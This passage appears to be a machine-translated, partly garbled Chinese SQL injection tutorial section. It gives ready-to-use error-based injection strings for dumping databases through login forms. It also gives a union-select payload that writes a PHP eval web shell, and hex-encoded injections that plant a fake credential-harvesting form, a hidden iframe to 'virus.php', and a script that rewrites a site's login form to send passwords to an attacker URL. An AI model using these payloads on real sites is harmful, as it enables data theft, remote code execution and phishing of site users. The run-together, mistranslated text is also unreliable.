#0x10~更新 我借此机会更新此complet文件undefined #0x10.a~绕过登录高级我希望你喜欢阅读“Bypassing Logins”一章。 因此,现在是时候了解如何将某个易受攻击的登录表单的数据库转出。 <?phpselect username,pass from users where username="$uname" and password="$passwrd" limit 0,1select username,pass from users where username='$uname' and password='$passwrd' limit 0,1 代码: username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #username : " or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #username : ' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --username : " (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --您可以再次将密码字段留空。 现在让我们看看查询将传递什么。 <?phpselect username,pass from users where username='' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='' and password='' limit 0,1 #0x10.b~SQL注入的RFI如果您已阅读本文并了解RFI漏洞,则无需解释。 这很容易! <?phpsite.com/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls'); #0x10.c~URLS欺骗性网络钓鱼这次标题说明了我们将使用SQL注入漏洞利用URL欺骗进行网络钓鱼。 有三种方法 我们将把有效负载注入SQL注入,并像在XSS中一样在网页上添加一些额外的代码。 首先,注入HTML。 为简单起见,我们将有效负载编码为十六进制。 对于有效载荷: <?php<form action=http://site.com/w0rm.php method="POST">Username : <input type="text" name="username"><br>Password :<input type="text" name="password"><input type="submit"></form><iframe height=0 width=0> 编码为十六进制: 3c666f726d20616374696f6e3d687474703a2f2f736974652e636f6d2f7730726d2e706870206d65 74686f643d22504f5354223e0d0a557365726e616d65203a203c696e70757420747970653d227465 787422206e616d653d22757365726e616d65223e3c62723e0d0a50617373776f7264203a3c696e70 757420747970653d227465787422206e616d653d2270617373776f7264223e0d0a3c696e70757420 747970653d227375626d6974223e0d0a3c2f666f726d3e0d0a3c696672616d65206865696768743d 302077696474683d303e在注入的SQL中注入Hex(有效载荷)。 注射iframe 例如: <?php<br><iframe src="http://site.com/virus.php" height=300 width=300 frameBorder="0" scrolling="no"></iframe> 代码: 3c62723e3c696672616d65207372633d22687474703a2f2f736974652e636f6d2f76697275732e70 687022206865696768743d3330302077696474683d333030206672616d65426f726465723d223022 207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5--PHP代码: <?phpsite.com/link.php?id=-1'+union+select+1,2,0x3c62723e3c696672616d65207372633d22687474703a2f2f736974652e6 36f6d2f76697275732e70687022206865696768743d3330302077696474683d333030206672616d6 5426f726465723d223022207363726f6c6c696e673d226e6f223e3c2f696672616d653e,4,5-- 更改当前表格 在这次攻击中,我们将在网站中注入javascript,将网站中当前登录页面的操作更改为我们的虚假登录页面链接。 <?php<script>document.getElementsByTagName("form")[0].action="http://www.site.com/virus.php"</script> 代码: 3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e616d65282266 6f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636f6d2f766972 75732e706870223c2f7363726970743ePHP代码: <?phpsite.com/link.php?id=-1' union select 1,2,0x3c7363726970743e646f63756d656e742e676574456c656d656e747342795461674e6 16d652822666f726d22295b305d2e616374696f6e3d22687474703a2f2f7777772e736974652e636 f6d2f76697275732e706870223c2f7363726970743e,4,5--
|